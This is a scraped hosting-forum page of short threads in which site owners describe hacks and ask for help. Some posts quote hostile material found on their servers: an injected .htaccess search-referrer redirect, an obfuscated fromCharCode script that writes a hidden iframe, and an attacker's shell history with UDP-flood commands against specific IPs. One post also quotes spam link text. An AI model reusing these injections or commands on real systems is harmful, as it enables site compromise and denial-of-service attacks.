Web Hosting :: Website Hacked, IP And Domain

Website Hacked
my site is hacked regularly

today when i checked htaccess file i found

Code:
# a0b4df006e02184c60dbf503e71c87ad
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_-]+.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24). [NC]
RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=
RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)=[^&]+(%3A|%22)
RewriteCond %{TIME_SEC} <59
RewriteRule ^.*$ /admin/editor/filemanager/browser/default/images/ucohex/ex3/t.htm [L]
# a995d2cc661fa72452472e9554b5520c
in it what does this code does.

View Replies! View Related

My Website Has Just Been Hacked
I have been getting a lot of abusive email lately, just deleted them and thought nothing off it. Just about to go to bed and I see my website has been hacked.

www.pic-spot.com

They also said they were after www.anotherlaugh.com and www.shinyproxy.com

View Replies! View Related

Website Continuously Hacked
few sites are continously been hacked, these sites i m working on, whenever i connect the sites through FTP client(i m using Flash FXP) and upload the files the very next day the index file have the Iframe code written after the body tag by someone else of some malware site.

i have tried everything, changing the password on daily basis,even reinstall my system completey(thinking if there any backdoor trojan) firewall and antivirus,

View Replies! View Related

Securing Website - Hacked
We have a simple flash site. Not CMS or anything of that sort.

Recently out site was hacked. Nothing malicious as the only code that seems to have changed was out index file in which they injected a malware script ....

View Replies! View Related

Joomla Website Get Hacked
One of my clients has joomla site installed on his hosting.

But recently his website always get hacked. Hacker put one index.html file in the public_html folder. luckily they not deleting file and database..

This is happen twice in one week, even he change the cpanel password to a more complex one...

anyway to prevent this? any way to harden the security?

View Replies! View Related

Strange Domain Become Parked Domain- Is This Hacked
I just when found this domain on google when I was make some search of content of my site
I found domain as a parked domain and work for my site!

so I go to cpanel and parked domain but not found any thing

so what this mean how someone have parked domain for my site and when i go to cpanel noting foudn also when I go to whm and accoubt listed I don’t find that domain?

View Replies! View Related

Website Hacked. Time For A New Host
I have a small but somewhat popular space-history website. Very simple HTML that I typed into wordpad, but it has long pages full of photos. Since 2003, I've been using media3.net with their business-class Windows service.

A few weeks ago, mypages were hacked, and a one line script inserted that called an Adobe Flash file. Apparently this was a server-wise attack, not just my web pages. Media3.net cleaned this up, but now it has happened again.

This is bad, because Google blacklists my site, and folks on Wikipedia get upset because there are a lot of links to my site.

How are they breaking in to media3.net? I think I must change hosts, but I don't want to put my image-intensive site on overbooked hardware with limited bandwidth.

View Replies! View Related

Website Hacked, But Not Sure About The Enter Server
my server was hacked by Cold he/she inserted a couple of scripts that enabled remote access into a 777 permission folder.

i found the following script names:
back.pl
cpanel.php
cgitelnet.pl
cpanel.pl
gcc-cold <- shell script

i have deleted all the above files, and changed the folder chmod to 755

but the weird thing is, through shell, when i try to locate the file gcc-cold i get this:

Quote:

root@ [/tmp]# locate gcc-cold
/home/ns5f6/public_html/uploads/gcc-cold
root@ [/tmp]# rm /home/ns5f6/public_html/uploads/gcc-cold
rm: cannot lstat `/home/ns5f6/public_html/uploads/gcc-cold': No such file or directory

isn't locate NOT supposed to find that file after its been deleted? and if it was not deleted some how, isn't it supposed to delete it? am i missing something here??????

from a bit of researching the files, i found that it was a telnet script, BUT i have telnet disabled, and there's no process running along side GREP TELNET

how can i find malicious software or shell scripts that allow such hacking activities on the server?

View Replies! View Related

Hijacked / Hacked Domain By HostOnce
I've been handling the design and updates for a local private school for a few years now. They use HostOnce for hosting. Over 2 weeks ago I noticed that when I try to bring the site up in a browser I get a login prompt - [url]. I've submitted several help desk tickets to HostOnce with no response. Since school is starting, I recommended the school change hosting providers. So they bought hosting with GoDaddy who I also use. But now I need to transfer the domain name and I can't get a response from HostOnce. I send an email requesting that they initiate the domain transfer to GoDaddy every day with no response.

Besides a few email addresses and the help desk, there doesn't seem to be any way I can get in touch with anyone at HostOnce. What options do I have left? The school is currently stuck with a site that can't be accessed. The company seems to be in Australia but I've read the phone number listed for them does not work. I'm looking for a US phone number or something.

View Replies! View Related

Facebook's Domain Name/dns Hacked
A while back you could see the following information regarding facebook.com:

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Server Name: FACEBOOK.COM.ZZZZZ.GET.LAID.AT.WWW.SWINGINGCOMMUNITY.COM
IP Address: 69.41.185.229
Registrar: INNERWISE, INC. D/B/A ITSYOURDOMAIN.COM
Whois Server: whois.itsyourdomain.com
Referral URL: http://www.itsyourdomain.com

Server Name: FACEBOOK.COM.MORE.INFO.AT.WWW.BEYONDWHOIS.COM
IP Address: 203.36.226.2
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net

Domain Name: FACEBOOK.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: DNS04.SF2P.TFBNW.NET
Name Server: DNS05.SF2P.TFBNW.NET
Name Server: DNS1.SCTM.TFBNW.NET
Name Server: DNS2.SCTM.TFBNW.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 02-aug-2007
Creation Date: 2 Expiration Date: 30-mar-2010

>>> Last update of whois database: Mon, 28 Jan 2008 23:23:21 UTC <<<

NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict oWhois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. .....

View Replies! View Related

If I Use My Domain As A Nameserver Can It Still Be The Website
Basically as the title says I have a domain thedrunkengamer.net that is my main domain and website, I just got a dedicated server and in the startup steps in WHM im at the Nameserver setup screen.

If i go to GoDaddy and register ns1.thedrunkengamer.net and ns2.thedrunkengamer.net as nameservers can I still use www.thedrunkengamer.net as my website?

If so by doing this will it impact the performance of my website at all? Should I register a seperate domain to use for nameservers?

View Replies! View Related

About My Website Moving And New Domain Name
I've purchased a forum, using a sub-domain name like bbs.mywebsite.com.

All the files will be moved to my new dedicated server.

I'd like to use a new domain name for it, like newname. com

but still to not lose current memebers, still we want to keep bbs.mywebsite.com working as before.

I have 5 IP availble and want to allocate one of them to the new domain name newname .com
================================================== ====
Now, question, what should I do, can some one give me instruction step by step please, to make 2 domains both bbs.mywebsite.com and newname. com working properly. don't want to use redirect.

Now what I can think of is, add newname. com to my account, and change DNS to point to my nameserver, then copy the whole forum under new website. I dont know if this way is correct. Then I don't know how to link the original forum address to the new space.

View Replies! View Related

Domain Name Redirecting To Unknown Website
I came across a problematic situation today. Our client pmb.com.my has complained that their domain, when accessed from search engines will go to another site, not theirs. So, perhaps you guys can try this out.

1. Type the URL on the browser directly: [url]
You'll get the real site.

2. Try searching for "pmb malaysia" on Google:
[url]

3. You should see a normal listing for the site as the 1st result. Try clicking that link.

4. In our checks, it will go to a landing page (black bankground), and will redirect to an adult site.

5. You get this landing page too when you click the link to the site in step 1.

Appreciate if more people can try this out and post your findings here. I've contacted the RZ (site hosted there), and they said it is an issue with Google's cache. Not sure I buy that.

View Replies! View Related

Preview Website Before Domain Update
I've recently opened an account at a shared webhosting, cPanel managed. I've assigned it the main domain name I plan to use, but currently that domain points to another webhosting.

Before I proceed with the change of nameservers and make the definitive switch from the old to the new host, is there any way I can privately preview my site (100% HTML) from the new host? I'd like to ensure it's working OK before making the jump.

I've tried to add an entry to my local HOSTS file assigning my domain to the new host IP, but I only get a default page from the new server.

View Replies! View Related

DNS Config For Domain, Website & EMail On Different Hosts
DNS config for Domain, Website

View Replies! View Related

Create SSL Website Or Sub Domain - CPanel And No Panel
I would like to create an SSL website for parts of my domain. I have a few VPS's one running cPanel, the others running just Webmin.

Now I have managed to install SSL as I can login to WHM/cPanel using the secure port fine. Also I have installed SSL on the Webmin VPS's as I followed www.webmin.com/ssl.html which tells you how.

However I would like to get sections of my website secure i.e secure.mydomain.com would be HTTPS, and the rest of the site just normal HTTP.

View Replies! View Related

How To Point Www.website.com To Website.com (or Vice Versa)
If I type google.com in my address bar, it forwards me to www.google.com. This is not happening for my website right now. I think its a good idea to do this, since then search engines will have only 1 main URL for the website to index.

My question is:

How do I implement this? I think this may involve mucking with CNAME settings...

View Replies! View Related

Redirecting Domain.com And Www.domain.com To X.domain.com
I own a website, domain.com.

When people go to [url] or [url] I would like them to be redirected to [url]

View Replies! View Related

How To Redirect.. Www.website.com -> Www.website.com/forums
I want my users to be redirected directly to my forum

so when they type in www.mywebsite.com it will redirect instantly to www.mywebsite.com/forums

I know this can be done on Cpanel... any other ways?

View Replies! View Related

Hacked Or Not
2 days ago i noticed my cpanel hardisk usage was a lot more then it should be, after looking around i found out my inbox was 400mb (82143)emails!! i don't use any of the cpanel email because i have them set to forwarding. all the emails are spam and i discovered a few emails using my domain (that i did not create) that are valid and when i email them it reaches this cpanel inbox

So how bad is it? have i been completely comprised or is someone managed to get some type of spaming access only?

View Replies! View Related

Been Hacked
I have a server with about 100 domains on it in Plesk. I have about 10 or so clients that pay me a pittance to host their site and the rest are various domains that have been parked.

About a week ago we received a "too many connections" error when accessing Plesk. This is our server and it sits at The Planet (formerly EV1). I cranked up the mx connections to 1,100 or so following some web tutorial but I'm really a complete idiot when it comes to this server stuff. (I'm more of a php / html kind of guy).

I check out logs and it appears that someone has been trying to access a bunch of celebrity images that shouldn't exist on our server. It's clearly spam of some kind. I can't seem to actually find these images on my server anywhere, but I've got a feeling that foul play has been involved.

View Replies! View Related

I Got Hacked
Well, this is rather weird. I cant tell if this is a server error, or a hack.

Basically the contents of the thumbnail directories for videos, games and pictures were deleted, at 3pm today (according to the ftp time stamp). All those folders were chmodded 777, to allow PHP to upload the images into them.

View Replies! View Related

Hacked
My cpanel server has an intruder who brought all the sites down. I did my best to harden the server a year or so ago, but...

I got an email from one of my scripts:

SUBJECT: [hackcheck] kill has a uid 0 account

IMPORTANT: Do not ignore this email.
This message is to inform you that the account kill has user id 0 (root privs).
This could mean that your system was compromised (OwN3D). To be safe you should verify that your system has not been compromised.

To say the least, the server was compromised. I cannot find the user "0" or "kill" in WHM, but under "Wheel Group Users" "kill" is listed under "Add a user to the wheel group."

Any help or insight would be appreciated! Anyone proficient at hardening servers and exorcising hackers?

I uploaded the latest chkrootkit and ran it. The results say it's clean.

View Replies! View Related

Am I Hacked And Anything I Can Do
Am I hacked by somebody?

Any thing I can do to stop this (for example by hiring server management company)???

Here's the info that RKHunter provided:

/sbin/modinfo [ NA ]
/sbin/insmod [ NA ]
/sbin/depmod [ NA

Rootkit 'RH-Sharpe's rootkit'... [ Warning! ]

--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------

Checking users with UID '0' (root)... [ Warning! (some users in root group) ]
info: adm:0

And here's the info I've found after investigation:

-bash-2.05b# pwd
/usr/local/games
-bash-2.05b# ls -lah
total 332K
drwxr-xr-x 3 root root 4.0K Feb 5 15:59 .
drwxr-xr-x 15 root root 4.0K Feb 12 19:32 ..
drwxr-xr-x 3 1555 1555 4.0K Feb 2 12:58 .fl
-rwxr-xr-x 1 root root 263K Feb 2 12:51 ettercap
-rwxr-xr-x 1 root root 17K Feb 2 12:51 parse
-rw-r--r-- 1 root root 119 Feb 2 12:51 pid
-rw-r--r-- 1 root root 27K Feb 3 17:44 x
-bash-2.05b#

View Replies! View Related

Am I Hacked
i daily check my error log files to see if something was wrong , checkout what i found

the first one is probably trying to hack my site to get to my ads and changing it to them i think
[error] [client 195.23.16.24] File does not exist: /var/www/html/a1b2c3d4e5f6g7h8i9
[error] [client 195.23.16.24] script '/var/www/html/adxmlrpc.php' not found or unable to stat
[error] [client 195.23.16.24] File does not exist: /var/www/html/adserver
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpAdsNew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpadsnew
[error] [client 195.23.16.24] File does not exist: /var/www/html/phpads
[error] [client 195.23.16.24] File does not exist: /var/www/html/Ads
[error] [client 195.23.16.24] File does not exist: /var/www/html/ads

this 1 I dont know

[error] [client 71.190.229.120] File does not exist: /var/www/html/_vti_bin
[error] [client 71.190.229.120] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/_vti_bin
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice
[error] [client 69.181.195.171] File does not exist: /var/www/html/MSOffice

This 1 is kinda keep me scared i dont know what it is either

[Mon May 21 16:11:00 2007] [error] [client 129.29.227.4] Invalid URI in request T 5.1; U; en)
[Tue May 22 15:59:09 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179781859
[Tue May 22 16:09:15 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:20 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179867547
[Tue May 22 16:09:24 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:25 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:09:29 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:29:29 2007] [error] [client 129.29.227.4] Invalid URI in request f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179868171
[Tue May 22 16:30:23 2007] [error] [client 129.29.227.4] Invalid URI in request d14379f705120b3663bb; yab_logined=0; yab_uid=0; yab_last_click=1179869368
[Tue May 22 16:30:26 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0
[Tue May 22 16:30:28 2007] [error] [client 129.29.227.4] Invalid URI in request -gzip, identity, *;q=0

View Replies! View Related

Hacked
my server hacked

24 cat /proc/cpuinfo
25 ls
26 cd /var/tmp
27 ps x
28 ls
29 mkdir .www
30 cat /proc/cpuinfo
31 cat /etc/issue
32 mkdir .ww
33 cd .ww

36 download alexscan.tar.gz
37 tar xvfz alexscan.tar.gz
38 tar xvf alexscan.tar.gz
39 cd Vek
40 ls
41 ./Vek 210
42 ls
43 cd ..
44 ./ss
45 ls
46 cd ..
47 cd .ww
48 download joker.tgz
49 tar xvfz joker.tgz
50 download flood-udp.tar
52 tar xvfz flood-udp.tar
53 tar xvf flood-udp.tar
54 perl udp.pl 72.8.131.39 0 0
55 perl udp.pl 89.42.72.6 0 0
56 perl udp.pl 83.42.64.149 0 0
57 passwd
58 ls
59 cd joker
60 ls
61 chmod +x *
62 ./x 23.12

View Replies! View Related

Hacked? Or Not
I have a new server and I have hardened it with csf+lfd. It's about 65/70 in the cfs score.

This morning, I noted that lfd log sent me an email saying there is a SSH login via 207.210.233.128 on 10th May 2007. I am not sure whether it was a successful login or not?

Here is the output:
=================
Time: Thu May 10 01:31:52 2007IP: 207.210.233.128 (Unknown)Account: rootMethod: password authentication
========================

I know for sure that I did not login my SSH yesterday.

However, when I logged in SSH this morning, it says in telnet that my last login was from my own home computer's IP, so from that it looks like no one else has logged in SSH since last time I logged in myself.

Was my server intruded or was lfd just playing up?

View Replies! View Related

I've Been Hacked
Go to this page:

[url]

how I can find out what page they have changed? It is a php file with loads of includes etc. Not sure where to look! Or could it be a redirect or something?

View Replies! View Related

Forward Mail From Parked Domain To Primary Domain - How? MX Record?
OK, I am confused. I have one domain that is parked on top of another domain. I would like Mail that comes to the parked domain to be automatically forwarded to the same user name at the primary domain.

Can I change a DNS or MX record to facilitate this?

View Replies! View Related

Reverse Domain Name Server (DNS) ARPA For Domain On VPS
I have a vps with dedicated ip's for my domain names.

I read that in order for mails coming from my server not be picked up as spam, i need to add reverse ip entries.

Now i have already added the glue nameserver records on my godaddy control panel,

ns1.mydomain.com -> 10.20.30.40
ns2.mydomain.com -> 10.20.30.41

But do i need to speak to the datacenter to add the reverse dns entries for my domain on their nameservers? What about if i host my nameservers offsite, but then have my webserver/mailserver etc inside the datacenter? Would i need to request the datacenter where the nameservers are hosted to add the reverse ip entries for the domain, and then the request the same from the datacenter for my web/mail servers to add the reverse entries?

Is it really required?

View Replies! View Related

WHMCS Hacked
Now, first of all... I'm not sure if this is a problem with WHMCS or some other piece of software with a security hole, but I thought I should post here.

Our WHMCS got hacked earlier today and the hacker sent out a to be honest, unacceptable email to all clients, I won't go into detail but lets just say it directly insulted them.

Now apart from ruining our reputation and client relationships, I am now completely paranoid that it will happen again. I'd also like to know how it happened in the first place. The hacker signed up for a hosting account, and then sent the email. I have no idea how he/she did it, but when I look at the admin log in WHMCS, it shows the username "hacked" as logging in (see image).http://img378.imageshack.us/img378/2560/hackedmh9.png

Just a warning to everyone out there. His IP address was 86.132.228.82.

View Replies! View Related

SITE WAS HACKED!
A client's site was hacked last week and spyware or some kind of trojan was put on it. I found some files that didn't belong in the images folder and proceeded to delete them, however, when I submitted the site back to Google for review, the report came back saying there was still malware on the site. They didn't provide me with the location of the spyware, so what can I do to find it and delete it?

View Replies! View Related

We Were Hacked, Where Do We Start.
we have a vps server and someone did what I would call a calling card attack, thankfully.

It is a stock kubuntu os with stock apache. Root passwords for everything have been changed to our own

Somehow they logged into kubuntu as root and changed the htpasswd in usr/passwords (changed to protect the password).

Then since they changed the htpasswd they were able to log into phpmyadmin and changed the admin password in the database.

I'm pretty sure I know who did it and he is teaching us a lesson which I respect but he will not comunicate with us.

We have hourly snapshots of our vps and we need to know how they are getting in. See my sig and click on the hotspot login.

Looking at the sudoers there is the Defaults line that we suspect as a means to get in.

We have a great php etc... app but it is either Apache or kubuntu that they can get in.

I would like to learn about what needs to be done about security but where do I start?

Can someone help me look for something that would allow the attack?

I'm a php guy and it is not a mysql injection attack nor is it an xss attack.

I am not a kubuntu / server security guy and now need your advice.

View Replies! View Related

Hacked VPS
I am renting a 384mb Plesk VPS, have 1 client website on it, and it was hacked. Someone set up a new user with root access and was attacking other networks including dictionary attacks. My host has cleaned up the mess. I suspect access was gained thru a weak password choice or thru a Wordpress hack.

The client website ran a php/mysql survey script sometimes with 20-25 simultaneous users, and about 5-10% were unable to complete the survey due to screen freeze up or time outs. I'm trying to get to the bottom of these errors and know that some of the problems were client side but could the attacks also have affected connectivity & website performance?

View Replies! View Related

My Site Has Been Hacked
One of my clients has just sent me a bounced email to an address she had never heard of. This made me suspect my server had been hacked and was being used for a scam.

Sure enough, I found a file in one of my folders, that was related to a Bank of America scam.

I have since put a password on this folder. But does anyone have any advice on how to secure the site to prevent this happening again? It is a shopping cart and the 'rogue' file was in the admin area of the shopping cart.

View Replies! View Related

My Server Seems Be Hacked
SOme one has claimed that he has penetrated my server and has gathered some kind of information via shell access, I have disabled the possible ways of shell access for the users via twaek settings, and php.ini

- How I can check he has made any backdoor for himself or not?
and I have made a trojan check via Scan for Trojan Horses in WHM, and it has found about 200 possible trojans.

- How I can remove them?

View Replies! View Related

Was My Server Being Hacked ?
217.67.250.41 - - [18/May/2009:15:36:08 +0100] "GET /w00tw00t.at.ISC.SANS.DFind HTTP/1.1" 400 226 "-" "-"

What is mean ? Sorry for ask a fast answer. I have change my domain's IP to protect someone can run dangerous script...

View Replies! View Related

My Server Hacked?
My dedicated server was rather slow. Upon checking, I had a new cron job, (deleted now) made by apache, pinting to the following IRC bot.

[root@server50040 tmp]# cd .LiveZone/
[root@server50040 .LiveZone]# ls -al
total 384
drwxr-xr-x 10 apache apache 4096 Dec 21 12:17 .
drwxrwxrwt 3 root root 4096 Dec 21 12:15 ..
-rwxr-xr-x 1 apache apache 320 Dec 9 2004 config
-rw------- 1 apache apache 1002 Dec 9 2004 config.h
-rw-rw-r-- 1 apache apache 55 Dec 20 22:55 cron.d
-rwxr-xr-x 1 apache apache 347 Dec 9 2004 ****
drwxr-xr-x 2 apache apache 12288 May 31 2002 help
-rwxr-xr-x 1 apache apache 210216 Dec 9 2004 httpd
drwxr-xr-x 2 apache apache 4096 Jan 12 2002 lang
-rw------- 1 apache apache 492 Dec 21 12:17 livezone
-rw-rw-r-- 1 apache apache 19 Dec 20 22:55 livezone.dir
-rw------- 1 apache apache 492 Dec 21 12:09 livezone.old
drwxr-xr-x 2 apache apache 4096 Dec 21 12:10 log
-rw-r--r-- 1 apache apache 2137 Sep 26 2003 Makefile
-rw-r--r-- 1 apache apache 731 Dec 9 2004 makefile.out
-rwxr-xr-x 1 apache apache 15090 Dec 9 2004 makesalt
drwxr-xr-x 3 apache apache 4096 Jul 30 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Jul 17 2000 motd
-rwxr-xr-x 1 apache apache 14306 Nov 13 2003 proc
-rw------- 1 apache apache 6 Dec 21 12:10 psybnc.pid
-rw-r--r-- 1 apache apache 10780 Dec 9 2004 README
-rwxr-xr-x 1 apache apache 68 Jun 4 2004 run
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 scripts
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 src
-rw------- 1 apache apache 3901 Jan 12 2002 targets.mak
drwxr-xr-x 2 apache apache 4096 Dec 9 2004 tools
-rwxr--r-- 1 apache apache 21516 Sep 25 2002 xh
-rwxrw-r-- 1 apache apache 194 Dec 20 22:55 y2kupdate

View Replies! View Related

Server Hacked ...
My server was hacked some time ago. I've changed passwords and scanned system for viruses, but found nothing.

Now, I'm looking into the log file /var/log/messages and I have few questions:

1. There are a lot of messages like: Apr 2 02:53:09 host
sshd(pam_unix)[29398]: authentication failure; logname= uid=0 euid=0 tty=ssh
ruser= rhost=203.196.151.235

Do these messages mean that hacker trying to enter the server under root?

2. There are messages like these:
Apr 2 03:56:10 host clamd[4678]: stream 1255: Worm.SomeFool.P.2 FOUND
Apr 2 10:46:10 host clamd[4678]: stream 2008: Worm.Bagle.pwd-eml FOUND

What does this mean? Virus on my server or something else?

3. Also, I can see a lot of messages like this one:
Apr 2 09:38:40 host clamd[4678]: stream 1111: Email.Phishing.RB-524 FOUND

Does someone read my emails?

View Replies! View Related

New Server Hacked
My server just got hacked i just bought it!!

and they was going to charge me anouther $35 to reset the password how stupid...

in the end we got it done free

View Replies! View Related

SwiftNIC Hacked?
does any of you know what actually happened with SwiftNic Servers?

My site (www.wincert.net) is unaccessible for almost 20 hours now and I haven't got a reply from my host! I was located on semi-dedicated server.

I've only got this mail about 12 hours ago:

Dear customers,<br /> <br /> We have discovered that our WHMCS client database may have been compromised in the last 48 hours.  While important information such as credit card data is encrypted it is possible that your password or your server login (if mentioned in a support ticket) may have been exposed.<br /> We encourage all customers to change their billing and Server login passwords ASAP.<br /> <br /> We are still investigating this incident so we can identify any possible weaknesses of our internal systems and take appropriate steps to maximize the <span class="nfakPe">security</span> of your information.<br /> Please let us know if you have any questions or need any assistance<br /> <br /> regards<br /> <span class="nfakPe">Swiftnic</span>

Who should I call, talk to, as for help, 'cause I really need my site back ASAP..

View Replies! View Related

How Do Websites Get Hacked?
Every now and then I'll run into a website that has a message that says it was hacked by a certain hacker. How exactly do this? Do they hack into the actual server or do they somehow get a hold of the website owners FTP info?

View Replies! View Related

Blog Got Hacked
One of my wordpress blogs got hacked and my site is redirecting to a different site.... When I check the phpmyadmin, there is another sql server that I am not familiar with... and there are around 17 table... I cannot delete the tables... I already contacted my host and still waiting for response...

The installed database is "information_schema (17)"

Are you familiar with this?

View Replies! View Related

Has Ipower Been Hacked?
I've had a Ipower hosting account since 2002 and recently even renewed both my service and domain registration.

I recently noticed that a small/odd javascript statement had been added to the bottom of my page and I didnt add it. I noticed this after visiting my page and when my Antivirus alerted me to ' HTML/Dldr.Iframe.DP [virus]' apparently some type of iframe redirect via this script to download malware.

After googling around about "HTML/Dldr.Iframe.DP [virus]" I found another person who has an ipower account mentioning the exact same problem on their site.

Does anybody know anything abou this?

Has anybody heard anything about ipower sites being recently hacked or something?

How and why has this happened? is my site just special and am I lucky? or has this recently also happened to other ipower accounts to?

I've contacted ipower but expect some generic response of no real help.

Most importantly, should I go through my few pages which comprise in fact my quite small site and check to see if they also have been hacked with malicious javascript code? Should I upload new pages? Change my password?

All of my content looks ok and in place, no pages defaced except apprently this small insertion of malicious javascript cod at the bottom of my main index page.

I have pasted just the basic fragment of the code below -

<script>eval(unescape("%77%69%6e%64%6f .....

View Replies! View Related

Site Up And Down- Am I Being Hacked
My site keeps going down every 10 minutes. It'll be online for 10 minutes, than down for another 10 minutes. It's been happening for like the past 3-4 hours. I can log into WHM without any problems, but the site itself site keeps crashing!

And last week somehow I found the code in all my index and home pages. Not any of my other pages like food.html or sleep.php, just the index.php and home.html type of pages.

Quote:

<script type="text/javascript" src="swfobject.js"></script>

<body><script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,11 4,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,11 4,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,3 9,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104, 50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114, 39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52, 52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>
</body>
</html>

What the heck is going on?

View Replies! View Related

Server Hacked
My server was hacked night before last and here is the log

Oct 28 10:30:47 server1 [19705]: connection from "173.45.118.58"
Oct 28 10:30:47 server1 [19705]: User root's local password accepted.
Oct 28 10:30:47 server1 [19705]: Password authentication for user root accepted.
Oct 28 10:30:47 server1 [19705]: User root, coming from 3a.76.2d.[url], authenticated.

View Replies! View Related

Ecatel Hacked
quick quote from what i got from a friend on msn:

Quote:

[3:08] @(garrett) Hey Sean
[3:08] @(garrett) Do we know whats going on yet?
[3:09] @(Sean) no
[3:09] @(Sean) ecatel is confused right now
[3:09] @(Sean) hackers may have access to more than helpdesk
[3:10] @(garrett) :/

and from my other friend on msn:

Quote:

ViSiOn says:

i woke up today to find e-mails from the help desk asking for all our servers to get wiped and formatted... so im going to have a few 1000 pissed clients.
ViSiOn says:

all my account info was changed too. i can't do anything. and i can't even reach ecatel via e-mail without my tickets getting deleted.

View Replies! View Related

Site Is Hacked
I got a problem that I could not understand. When I access my site, everything looks fine (from Japan). But other people who come from Vietnam, Singapore... can not and it shows homepage like this:

[url]

View Replies! View Related

Servage Hacked
We've been hacked, again. By we, I mean, many many servage clients as far as I can tell. Unlike past Javascript injections, this time it is much more serious, at least to me anyhow. Here is what I know:

Somehow, someone has gained full access to my (and again, many others) control panel on servage.net.

While on there, they have generously created their own ftp accounts with full access.

Every website I host with servage had a number of files uploaded to them.

These files consisted of one or more .htaccess files that contained a number of rewrites pointing to the other files they uploaded.

The new files were actually cleverly hidden inside other directories where they would go unnoticed. For example, on some of my sites that have forums, they were put into /forum/include/tmp/(bogus files), and in my galleries, put into such directories as /images/photos/(bogus files).

The files themselves are as follows:
a .htaccess file
css.js
keys.txt
links.txt
main.php
texts.txt
and tpl.php

The links.txt file itself is over 1.9mb and contains links to hundreds of other infected SERVAGE hosted websites ( I have checked at least 30 of them in whois.org and found all are hosted at servage).

Here is an example of the links.txt file:
chipandachair.co.uk/language/include/include/topic~3312.html|black break spring
chipandachair.co.uk/language/include/include/topic~1562.html|free exploited black teens
ra4prints.co.uk/inc/forum/style/group~190.html|nudist photographys
ra4prints.co.uk/inc/forum/style/group~3827.html|my nudist links
